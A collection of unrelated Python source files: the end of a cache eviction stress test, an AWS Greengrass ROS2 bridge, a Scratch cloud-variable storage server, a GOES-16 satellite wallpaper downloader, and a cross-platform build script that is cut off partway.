stress_test(eviction_policy=u'least-recently-used')
def stress_test_lfu():
"Stress test least-frequently-used eviction policy."
stress_test(eviction_policy=u'least-frequently-used')
def stress_test_none():
"Stress test 'none' eviction policy."
stress_test(eviction_policy=u'none')
def stress_test_mp():
"Stress test multiple threads and processes."
stress_test(processes=4, threads=4)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
'-n', '--operations', type=float, default=OPERATIONS,
help='Number of operations to perform',
)
parser.add_argument(
'-g', '--get-average', type=float, default=GET_AVERAGE,
help='Expected value of exponential variate used for GET count',
)
parser.add_argument(
'-k', '--key-count', type=float, default=KEY_COUNT,
help='Number of unique keys'
)
parser.add_argument(
'-d', '--del-chance', type=float, default=DEL_CHANCE,
help='Likelihood of a key deletion',
)
parser.add_argument(
'-w', '--warmup', type=float, default=WARMUP,
help='Number of warmup operations before timings',
)
parser.add_argument(
'-e', '--expire', type=float, default=EXPIRE,
help='Number of seconds before key expires',
)
parser.add_argument(
'-t', '--threads', type=int, default=1,
help='Number of threads to start in each process',
)
parser.add_argument(
'-p', '--processes', type=int, default=1,
help='Number of processes to start',
)
parser.add_argument(
'-s', '--seed', type=int, default=0,
help='Random seed',
)
parser.add_argument(
'--no-create', action='store_false', dest='create',
help='Do not create operations data',
)
parser.add_argument(
'--no-delete', action='store_false', dest='delete',
help='Do not delete operations data',
)
parser.add_argument(
'-v', '--eviction-policy', type=unicode,
default=u'least-recently-stored',
)
args = parser.parse_args()
OPERATIONS = int(args.operations)
GET_AVERAGE = int(args.get_average)
KEY_COUNT = int(args.key_count)
DEL_CHANCE = args.del_chance
WARMUP = int(args.warmup)
EXPIRE = args.expire
random.seed(args.seed)
start = time.time()
stress_test(
create=args.create,
delete=args.delete,
eviction_policy=args.eviction_policy,
processes=args.processes,
threads=args.threads,
)
end = time.time()
print('Total wall clock time: %.3f seconds' % (end - start))
|
app.py
|
#!/usr/bin/env python3
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED,INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import rclpy
from rclpy.node import Node
import json
from std_msgs.msg import String
from functools import partial
import threading
import awsiot.greengrasscoreipc as gg
import awsiot.greengrasscoreipc.model as model
class GreengrassBridge(Node):
ros_publishers = {}
iot_publishers = {}
def __init__(self):
super().__init__("greengrass_bridge")
self.declare_parameters(
namespace="",
parameters=[
("iot_topics", []),
("ros_topics", []),
("timeout", 10)
]
)
self.get_logger().info("Initializing Greengrass ROS2 Bridge...")
try:
self.iot_topics = self.get_parameter("iot_topics")._value
self.ros_topics = self.get_parameter("ros_topics")._value
except:
self.iot_topics = []
self.ros_topics = []
self.get_logger().error("Invalid ros topics / iot topics arguments.")
self.get_logger().info(" ==== ROS TOPICS ====")
self.get_logger().info(str(self.ros_topics))
self.get_logger().info(" ==== IoT TOPICS ====")
self.get_logger().info(str(self.iot_topics))
self.timeout = self.get_parameter("timeout")._value
self.get_logger().info("Timeout: %s" % self.timeout)
self.ipc_client = gg.connect()
self.init_subscribers()
def init_subscribers(self):
for topic in self.iot_topics:
self.get_logger().info("Setting up IoT subscriber for %s" % topic)
self.ros_publishers[topic] = self.create_publisher(String, topic, 10)
handler = gg.client.SubscribeToIoTCoreStreamHandler()
handler.on_stream_event = self.execute_publish_thread
operation = self.ipc_client.new_subscribe_to_iot_core(stream_handler=handler)
response = operation.activate(model.SubscribeToIoTCoreRequest(
topic_name=topic.strip(),
qos=model.QOS.AT_LEAST_ONCE
))
response.result()
self.get_logger().info("Subscribed to iot topic %s" % topic.strip())
for ros_topic in self.ros_topics:
self.get_logger().info("Setting up ROS Topic subscriber for %s" % ros_topic)
self.iot_publishers[ros_topic] = partial(self.publish_to_iot, ros_topic)
self.create_subscription(String, ros_topic.strip(), self.iot_publishers[ros_topic], 1)
self.get_logger().info("Subscribed to ros topic %s" % ros_topic.strip())
def execute_publish_thread(self, event: model.IoTCoreMessage):
try:
self.get_logger().info("Kicking off the thread.")
t = threading.Thread(target = self.publish_to_ros2, args=[event])
t.start()
except Exception as ex:
self.get_logger().error(str(ex))
def publish_to_ros2(self, event: model.IoTCoreMessage):
try:
message = str(event.message.payload, "utf-8")
topic = event.message.topic_name
self.get_logger().info("Received message on topic %s from AWS IoT Core %s" % (message, topic))
ros_msg = String()
ros_msg.data = message
self.ros_publishers[topic].publish(ros_msg)
self.get_logger().info("Published message: %s to topic %s" % (message, topic))
except Exception as ex:
self.get_logger().error(str(ex))
def publish_to_iot(self, topic, msg):
self.get_logger().info("Publishing message to the cloud: %s" % msg.data)
operation = self.ipc_client.new_publish_to_iot_core()
operation.activate(model.PublishToIoTCoreRequest(
topic_name=topic,
qos=model.QOS.AT_LEAST_ONCE,
payload=json.dumps(msg.data).encode(),
))
future = operation.get_response()
future.result(self.timeout)
def main(args=None):
rclpy.init(args=args)
node = GreengrassBridge()
try:
rclpy.spin(node)
except KeyboardInterrupt:
pass
node.get_logger().info("Closing ROS Bridge")
node.destroy_node()
if __name__ == "__main__":
main()
|
scCloudStorage.py
|
"""
The Cloud Storage File.
"""
import time
import json
import string
from threading import Thread
from scratchconnect.CloudConnection import CloudConnection
from scratchconnect.scEncoder import Encoder
SUPPORTED_CHARS = list(string.ascii_uppercase + string.ascii_lowercase + string.digits + string.punctuation + ' ')
_VARIABLE_LENGTH = 256
_VARIABLES = ['Response1', 'Response2', 'Response3', 'Response4', 'Response5', 'Response6', 'Response7', 'Response8']
_FAIL = 0
_SUCCESS = 1
_ACCESS_DENIED = 2
_ALREADY_EXIST = 3
_DOESNT_EXIST = 4
class CloudStorage:
def __init__(self, file_name, rewrite_file, project_id, client_username, csrf_token, session_id, token,
edit_access):
self.project_id = project_id
self.client_username = client_username
self.csrf_token = csrf_token
self.session_id = session_id
self.token = token
self.file_name = f"{file_name}.json"
self.rewrite_file = rewrite_file
self._make_file()
self.edit_access = edit_access
self.edit_access.append(client_username)
self._connect_cloud()
self.encoder = Encoder()
self.loop = True
def _connect_cloud(self):
self.cloud = CloudConnection(self.project_id, self.client_username, self.csrf_token, self.session_id,
self.token)
def _get_request(self):
return self._get_cloud_variable_data('Request')[0]
def _reset_request_var(self):
try:
self.cloud.set_cloud_variable(variable_name='Request', value=0)
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def _set_response_info(self, status_code):
try:
self.cloud.set_cloud_variable(variable_name='Response Info',
value=self.encoder.encode_list([status_code]))
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def _set_cloud_var(self, name, value):
try:
return self.cloud.set_cloud_variable(variable_name=name, value=value)
except: # lgtm [py/catch-base-exception]
time.sleep(1)
self._connect_cloud()
def start_cloud_loop(self, update_time=5, print_requests=False):
t = Thread(target=self._start_loop, args=(update_time, print_requests,))
t.start()
def _start_loop(self, update_time, pr):
while self.loop:
try:
if pr:
print("Checking for new request...")
r = self._get_request()
request = self.encoder.decode_list(str(r[0]))
if len(request) > 1:
request_type = request[0]
request_name = request[1]
if request_name == "":
request_name = None
user = r[1]
if pr:
print('-' * 30)
print(f"New Request {request_type}:")
print(f"\tType: {request_type}")
print(f"\tName: {request_name}")
print(f"\tUser: {user}")
print('-' * 30)
if request_type == "CREATE":
if user in self.edit_access:
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name in data:
self._set_response_info(status_code=_ALREADY_EXIST)
self._reset_request_var()
continue
else:
data[request_name] = 0
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "DELETE":
if user in self.edit_access:
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name not in data:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
else:
del data[request_name]
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "DELETE_ALL":
if user in self.edit_access:
file = self._open_file(mode='w')
file.write(json.dumps({}))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - Success!")
else:
self._set_response_info(status_code=_ACCESS_DENIED)
self._reset_request_var()
if request_type == "GET":
d = self._get_data(request_name)
if d is None:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
else:
data = self.encoder.encode(str(d))
divided_data = self._divide_code(data, _VARIABLE_LENGTH)
i = 0
while i < len(divided_data):
if divided_data[i] == '':
if self._set_cloud_var(name=_VARIABLES[i], value='') is False:
continue
else:
if self._set_cloud_var(name=_VARIABLES[i], value=divided_data[i]) is False:
continue
i += 1
time.sleep(0.5)
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
if request_type == "SET":
v = ""
i = 0
while i < len(_VARIABLES):
d = self.cloud.get_cloud_variable_value(_VARIABLES[i], limit=3)
if len(d) > 0:
v += d[0]
i += 1
time.sleep(0.1)
value = self.encoder.decode(v)
file = self._open_file(mode='r+')
data = json.loads(file.read())
file.close()
if request_name in data:
data[request_name] = value
else:
self._set_response_info(status_code=_DOESNT_EXIST)
self._reset_request_var()
continue
file = self._open_file(mode='w')
file.write(json.dumps(data))
file.close()
self._set_response_info(status_code=_SUCCESS)
self._reset_request_var()
if pr:
print(f"{request_type} - {request_name} Success!")
time.sleep(update_time)
except KeyboardInterrupt:
pass
def _make_file(self):
if self.rewrite_file:
file = open(self.file_name, 'w+')
else:
file = open(self.file_name, 'a+')
t_file = open(self.file_name, 'r')
if len(t_file.read()) == 0:
file.write(json.dumps({}))
t_file.close()
file.close()
def _open_file(self, mode='r'):
file = open(self.file_name, mode)
return file
def _get_data(self, key):
try:
file = json.loads(self._open_file(mode='r').read())
return file[key]
except KeyError:
return None
def _get_cloud_variable_data(self, variable_name, limit=100):
if str(variable_name.strip())[0] != "☁":
n = f"☁ {variable_name.strip()}"
else:
n = f"{variable_name.strip()}"
data = []
d = self.cloud.get_variable_data(limit=limit)
i = 0
while i < len(d):
if d[i]['Name'] == n:
data.append([d[i]['Value'], d[i]['User']])
i = i + 1
return data
def _divide_code(self, data, letters_length, list_length=8):
i = 0
divide = []
text = ""
while i < len(data):
text += data[i]
if len(text) >= letters_length:
divide.append(text)
text = ""
i += 1
if len(text) > 0:
divide.append(text)
while len(divide) < list_length:
divide.append('')
return divide
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
from lxml import html
import math
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
from logging import warnings
import appdirs
from PIL import Image, ImageDraw, ImageFilter
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment, is_discharging, download
# Semantic Versioning: Major, Minor, Patch
GOES16_BG_VERSION = (1, 2, 0)
counter = None
TILE_SIZE = 678
BASE_URL = "http://rammb-slider.cira.colostate.edu/data"
# The image is yuuge
warnings.simplefilter('ignore', Image.DecompressionBombWarning)
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://github.com/cameronleger/goes16-background")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*GOES16_BG_VERSION))
parser.add_argument("-s", "--size", type=int, choices=[678, 1356, 2712, 5424, 10848], dest="size", default=1356,
help="increases the quality (and the size) the image. possible values are 678, 1356, 2712, 5424, 10848")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download the image, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="goes16background", appauthor=False))
parser.add_argument("--composite-over", type=str, dest="composite_over",
help="image to composite the background image over",
default=None)
parser.add_argument("--no_set_bg", dest="no_set_bg", action='store_true',
help="do not try to set background, just download file", default=False)
try:
args = parser.parse_args()
except:
parser.print_help()
sys.exit(0)
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def download_chunk(args):
global counter
base_url, latest, x, y, level, tile_count = args
url_format = base_url + "/imagery/{}/goes-16---full_disk/natural_color/{}/0{}/00{}_00{}.png"
url = url_format.format(strftime("%Y%m%d", latest), strftime("%Y%m%d%H%M%S", latest), level, y, x)
tiledata = download(url)
with counter.get_lock():
counter.value += 1
if counter.value == tile_count * tile_count:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, tile_count * tile_count))
return x, y, tiledata
def exit_thread(message):
print(message)
sys.exit(message)
def thread_main(args):
global counter
counter = mp.Value("i", 0)
tile_count = int(args.size / TILE_SIZE)
level = int(math.log(tile_count, 2))
print("Updating...")
latest_json = download("{}/json/goes-16/full_disk/natural_color/latest_times.json".format(BASE_URL))
latest = strptime(str(json.loads(latest_json.decode("utf-8"))["timestamps_int"][0]), "%Y%m%d%H%M%S")
print("Latest version: {} UTC.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
if args.composite_over is not None:
print("Opening image to composite over...")
try:
composite_img = Image.open(args.composite_over)
except Exception as e:
exit_thread("Unable to open --composite-over image!\n")
goes16_width = TILE_SIZE * tile_count
goes16_height = TILE_SIZE * tile_count
goes16_img = Image.new("RGB", (goes16_width, goes16_height))
p = mp_dummy.Pool(tile_count * tile_count)
print("Downloading tiles...")
res = p.map(download_chunk, it.product((BASE_URL,), (latest,), range(tile_count), range(tile_count), (level,), (tile_count,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
goes16_img.paste(tile, (TILE_SIZE * x, TILE_SIZE * y, TILE_SIZE * (x + 1), TILE_SIZE * (y + 1)))
output_img = goes16_img
if args.composite_over is not None:
print("Compositing over input image")
composite_width, composite_height = composite_img.size
resize_ratio = min(composite_width / goes16_width, composite_height / goes16_height)
goes16_img = goes16_img.resize((round(goes16_width * resize_ratio), round(goes16_height * resize_ratio)),
Image.ANTIALIAS)
radius_img = min(goes16_width, goes16_height) * resize_ratio / 2
goes16_center_img = Image.new("RGB", (composite_width, composite_height), "black")
goes16_center_img.paste(goes16_img, (round(composite_width / 2 - radius_img), round(composite_height / 2 - radius_img)))
radius = min(goes16_width, goes16_height) * resize_ratio * 0.995 / 2
left = round(composite_width / 2 - radius)
right = round(composite_width / 2 + radius)
top = round(composite_height / 2 - radius)
bottom = round(composite_height / 2 + radius)
mask_img = Image.new("L", (composite_width, composite_height), "black")
draw = ImageDraw.Draw(mask_img)
draw.ellipse((left, top, right, bottom), fill='white')
mask_img = mask_img.filter(ImageFilter.GaussianBlur(radius=2))
composite_img.paste(goes16_center_img, (0, 0), mask_img)
output_img = composite_img
for file in iglob(path.join(args.output_dir, "goes16-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("goes16-%Y%m%dT%H%M%S.png", latest))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
output_img.save(output_file, "PNG")
if not args.no_set_bg:
if not set_background(output_file):
exit_thread("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
def main():
args = parse_args()
print("goes16-background {}.{}.{}".format(*GOES16_BG_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="goes16-background-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
make.py
|
# coding: utf-8
from __future__ import print_function
import argparse
import multiprocessing
import os
import platform
import re
import shutil
import subprocess
import sys
import threading
import time
import zipfile
# The current test/decompression data version in use
current_test_data = 'test_data_v5'
current_decomp_data = 'decomp_data_v7'
def parse_argv():
parser = argparse.ArgumentParser(add_help=False)
actions = parser.add_argument_group(title='Actions', description='If no action is specified, on Windows, OS X, and Linux the solution/make files are generated. Multiple actions can be used simultaneously.')
actions.add_argument('-build', action='store_true')
actions.add_argument('-clean', action='store_true')
actions.add_argument('-clean_only', action='store_true')
actions.add_argument('-unit_test', action='store_true')
actions.add_argument('-regression_test', action='store_true')
actions.add_argument('-bench', action='store_true')
actions.add_argument('-run_bench', action='store_true')
actions.add_argument('-pull_bench', action='store_true') # Android only
actions.add_argument('-convert', help='Input/Output directory to convert')
target = parser.add_argument_group(title='Target')
target.add_argument('-compiler', choices=['vs2015', 'vs2017', 'vs2019', 'vs2019-clang', 'android', 'clang4', 'clang5', 'clang6', 'clang7', 'clang8', 'clang9', 'clang10', 'clang11', 'gcc5', 'gcc6', 'gcc7', 'gcc8', 'gcc9', 'gcc10', 'osx', 'ios', 'emscripten'], help='Defaults to the host system\'s default compiler')
target.add_argument('-config', choices=['Debug', 'Release'], type=str.capitalize)
target.add_argument('-cpu', choices=['x86', 'x64', 'armv7', 'arm64', 'wasm'], help='Defaults to the host system\'s architecture')
misc = parser.add_argument_group(title='Miscellaneous')
misc.add_argument('-avx', dest='use_avx', action='store_true', help='Compile using AVX instructions on Windows, OS X, and Linux')
misc.add_argument('-pop', dest='use_popcnt', action='store_true', help='Compile using the POPCNT instruction')
misc.add_argument('-nosimd', dest='use_simd', action='store_false', help='Compile without SIMD instructions')
misc.add_argument('-nosjson', dest='use_sjson', action='store_false', help='Compile without SJSON support')
misc.add_argument('-num_threads', help='No. to use while compiling and regressing')
misc.add_argument('-tests_matching', help='Only run tests whose names match this regex')
misc.add_argument('-help', action='help', help='Display this usage information')
num_threads = multiprocessing.cpu_count()
if platform.system() == 'Linux' and sys.version_info >= (3, 4):
num_threads = len(os.sched_getaffinity(0))
if not num_threads or num_threads == 0:
num_threads = 4
parser.set_defaults(build=False, clean=False, clean_only=False, unit_test=False, regression_test=False, bench=False, run_bench=False, pull_bench=False,
compiler=None, config='Release', cpu=None, use_avx=False, use_popcnt=False, use_simd=True, use_sjson=True,
num_threads=num_threads, tests_matching='')
args = parser.parse_args()
# Sanitize and validate our options
if args.use_avx and not args.use_simd:
print('SIMD is disabled; AVX cannot be used')
args.use_avx = False
if args.compiler == 'android':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Windows':
print('Android is only supported on Windows')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on Android')
sys.exit(1)
if not args.cpu in ['armv7', 'arm64']:
print('{} cpu architecture not in supported list [armv7, arm64] for Android'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'ios':
if not args.cpu:
args.cpu = 'arm64'
if not platform.system() == 'Darwin':
print('iOS is only supported on OS X')
sys.exit(1)
if args.use_avx:
print('AVX is not supported on iOS')
sys.exit(1)
if args.unit_test:
print('Unit tests cannot run from the command line on iOS')
sys.exit(1)
if not args.cpu in ['arm64']:
print('{} cpu architecture not in supported list [arm64] for iOS'.format(args.cpu))
sys.exit(1)
elif args.compiler == 'emscripten':
if not args.cpu:
args.cpu = 'wasm'
if not platform.system() == 'Darwin' and not platform.system() == 'Linux':
print('Emscripten is only supported on OS X and Linux')
sys.exit(1)
if args.use_avx:
print('AVX is not supported with Emscripten')
sys.exit(1)
if not args.cpu in ['wasm']:
print('{} cpu architecture not in supported list [wasm] for Emscripten'.format(args.cpu))
sys.exit(1)
else:
if not args.cpu:
args.cpu = 'x64'
if args.cpu == 'arm64':
if not args.compiler in ['vs2017', 'vs2019', 'ios', 'android']:
print('arm64 is only supported with VS2017, VS2019, Android, and iOS')
sys.exit(1)
elif args.cpu == 'armv7':
if not args.compiler == 'android':
print('armv7 is only supported with Android')
sys.exit(1)
elif args.cpu == 'wasm':
if not args.compiler == 'emscripten':
print('wasm is only supported with Emscripten')
sys.exit(1)
if platform.system() == 'Darwin' and args.cpu == 'x86':
result = subprocess.check_output(['xcodebuild', '-version']).decode("utf-8")
if 'Xcode 11' in result:
print('Versions of Xcode 11 and up no longer support x86')
sys.exit(1)
return args
def get_generator(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2015':
if cpu == 'x86':
return 'Visual Studio 14'
elif cpu == 'x64':
return 'Visual Studio 14 Win64'
elif compiler == 'vs2017':
if cpu == 'x86':
return 'Visual Studio 15'
elif cpu == 'x64':
return 'Visual Studio 15 Win64'
elif cpu == 'arm64':
# VS2017 ARM/ARM64 support only works with cmake 3.13 and up and the architecture must be specified with
# the -A cmake switch
return 'Visual Studio 15 2017'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
return 'Visual Studio 16 2019'
elif compiler == 'android':
# For Android, we use the default generator since we don't build with CMake
return None
elif platform.system() == 'Darwin':
if compiler == 'osx' or compiler == 'ios':
return 'Xcode'
elif compiler == 'emscripten':
# Emscripten uses the default generator
return None
elif platform.system() == 'Linux':
if compiler == 'emscripten':
# Emscripten uses the default generator
return None
return 'Unix Makefiles'
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def get_architecture(compiler, cpu):
if compiler == None:
return None
if platform.system() == 'Windows':
if compiler == 'vs2017':
if cpu == 'arm64':
return 'ARM64'
elif compiler == 'vs2019' or compiler == 'vs2019-clang':
if cpu == 'x86':
return 'Win32'
else:
return cpu
# This compiler/cpu pair does not need the architecture switch
return None
def get_toolchain(compiler, cmake_script_dir):
if platform.system() == 'Windows' and compiler == 'android':
return os.path.join(cmake_script_dir, 'Toolchain-Android.cmake')
elif platform.system() == 'Darwin' and compiler == 'ios':
return os.path.join(cmake_script_dir, 'Toolchain-iOS.cmake')
# No toolchain
return None
def set_compiler_env(compiler, args):
if platform.system() == 'Linux':
os.environ['MAKEFLAGS'] = '-j{}'.format(args.num_threads)
if compiler == 'clang4':
os.environ['CC'] = 'clang-4.0'
os.environ['CXX'] = 'clang++-4.0'
elif compiler == 'clang5':
os.environ['CC'] = 'clang-5.0'
os.environ['CXX'] = 'clang++-5.0'
elif compiler == 'clang6':
os.environ['CC'] = 'clang-6.0'
os.environ['CXX'] = 'clang++-6.0'
elif compiler == 'clang7':
os.environ['CC'] = 'clang-7'
os.environ['CXX'] = 'clang++-7'
elif compiler == 'clang8':
os.environ['CC'] = 'clang-8'
os.environ['CXX'] = 'clang++-8'
elif compiler == 'clang9':
os.environ['CC'] = 'clang-9'
os.environ['CXX'] = 'clang++-9'
elif compiler == 'clang10':
os.environ['CC'] = 'clang-10'
os.environ['CXX'] = 'clang++-10'
elif compiler == 'clang11':
os.environ['CC'] = 'clang-11'
os.environ['CXX'] = 'clang++-11'
elif compiler == 'gcc5':
os.environ['CC'] = 'gcc-5'
os.environ['CXX'] = 'g++-5'
elif compiler == 'gcc6':
os.environ['CC'] = 'gcc-6'
os.environ['CXX'] = 'g++-6'
elif compiler == 'gcc7':
os.environ['CC'] = 'gcc-7'
os.environ['CXX'] = 'g++-7'
elif compiler == 'gcc8':
os.environ['CC'] = 'gcc-8'
os.environ['CXX'] = 'g++-8'
elif compiler == 'gcc9':
os.environ['CC'] = 'gcc-9'
os.environ['CXX'] = 'g++-9'
elif compiler == 'gcc10':
os.environ['CC'] = 'gcc-10'
os.environ['CXX'] = 'g++-10'
elif compiler == 'emscripten':
# Nothing to do for Emscripten
return
else:
print('Unknown compiler: {}'.format(compiler))
print('See help with: python make.py -help')
sys.exit(1)
def do_generate_solution(build_dir, cmake_script_dir, test_data_dir, decomp_data_dir, args):
compiler = args.compiler
cpu = args.cpu
config = args.config
if compiler:
set_compiler_env(compiler, args)
extra_switches = ['--no-warn-unused-cli']
extra_switches.append('-DCPU_INSTRUCTION_SET:STRING={}'.format(cpu))
if args.use_avx:
print('Enabling AVX usage')
extra_switches.append('-DUSE_AVX_INSTRUCTIONS:BOOL=true')
if args.use_popcnt:
print('Enabling POPCOUNT usage')
extra_switches.append('-DUSE_POPCNT_INSTRUCTIONS:BOOL=true')
if not args.use_simd:
print('Disabling SIMD instruction usage')
extra_switches.append('-DUSE_SIMD_INSTRUCTIONS:BOOL=false')
if not args.use_sjson:
print('Disabling SJSON support')
extra_switches.append('-DUSE_SJSON:BOOL=false')
if args.bench:
extra_switches.append('-DBUILD_BENCHMARK_EXE:BOOL=true')
if not platform.system() == 'Windows':
extra_switches.append('-DCMAKE_BUILD_TYPE={}'.format(config.upper()))
toolchain = get_toolchain(compiler, cmake_script_dir)
if toolchain:
extra_switches.append('-DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain))
if test_data_dir:
extra_switches.append('-DTEST_DATA_DIR:STRING="{}"'.format(test_data_dir))
if decomp_data_dir:
extra_switches.append('-DDECOMP_DATA_DIR:STRING="{}"'.format(decomp_data_dir))
# Generate IDE solution
print('Generating build files ...')
if compiler == 'emscripten':
cmake_cmd = 'emcmake cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
else:
cmake_generator = get_generator(compiler, cpu)
if not cmake_generator:
print('Using default generator')
else:
generator_suffix = ''
if compiler == 'vs2019-clang':
extra_switches.append('-T ClangCL')
generator_suffix = 'Clang CL'
print('Using generator: {} {}'.format(cmake_generator, generator_suffix))
extra_switches.append('-G "{}"'.format(cmake_generator))
cmake_arch = get_architecture(compiler, cpu)
if cmake_arch:
print('Using architecture: {}'.format(cmake_arch))
extra_switches.append('-A {}'.format(cmake_arch))
cmake_cmd = 'cmake .. -DCMAKE_INSTALL_PREFIX="{}" {}'.format(build_dir, ' '.join(extra_switches))
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_build(args):
config = args.config
print('Building ...')
cmake_cmd = 'cmake --build .'
if platform.system() == 'Windows':
if args.compiler == 'android':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target INSTALL'.format(config)
elif platform.system() == 'Darwin':
if args.compiler == 'ios':
cmake_cmd += ' --config {}'.format(config)
else:
cmake_cmd += ' --config {} --target install'.format(config)
else:
cmake_cmd += ' --target install'
result = subprocess.call(cmake_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_convert(test_data_dir, args):
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run conversion')
sys.exit(1)
if not os.path.exists(args.convert):
print('Input/Output conversion directory not found: {}'.format(args.convert))
sys.exit(1)
# Validate that our regression testing tool is present
if args.compiler == 'emscripten':
compressor_exe_path = './bin/acl_compressor.js'
elif platform.system() == 'Windows':
compressor_exe_path = './bin/acl_compressor.exe'
else:
compressor_exe_path = './bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
# Grab all the test clips
conversion_clips = []
for (dirpath, dirnames, filenames) in os.walk(args.convert):
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
clip_filename = os.path.join(dirpath, filename)
conversion_clips.append(clip_filename)
# Grab the raw config
config_dir = os.path.join(test_data_dir, 'configs')
config_filename = os.path.join(config_dir, 'uniformly_sampled_raw.config.sjson')
print('Converting SJSON clips in {} ...'.format(args.convert))
conversion_failed = False
for clip_filename in conversion_clips:
output_filename = clip_filename.replace('.acl.sjson', '.acl')
if args.compiler == 'emscripten':
cmd = 'node "{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
else:
cmd = '"{}" -acl="{}" -config="{}" -out="{}"'.format(compressor_exe_path, clip_filename, config_filename, output_filename)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
result = subprocess.call(cmd, shell=True)
if result != 0:
print('Failed to run conversion for clip: {}'.format(clip_filename))
print(cmd)
conversion_failed = True
print('Done!')
if conversion_failed:
sys.exit(1)
def do_tests_android(build_dir, args):
# Switch our working directory to where we built everything
working_dir = os.path.join(build_dir, 'tests', 'main_android')
os.chdir(working_dir)
gradlew_exe = os.path.join(working_dir, 'gradlew.bat')
# We uninstall first and then install
if args.config == 'Debug':
install_cmd = 'uninstallAll installDebug'
elif args.config == 'Release':
install_cmd = 'uninstallAll installRelease'
# Install our app
test_cmd = '"{}" {}'.format(gradlew_exe, install_cmd)
result = subprocess.call(test_cmd, shell=True)
if result != 0:
sys.exit(result)
# Execute through ADB
run_cmd = 'adb shell am start -n "com.acl.unit_tests/com.acl.unit_tests.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_tests_cmake(args):
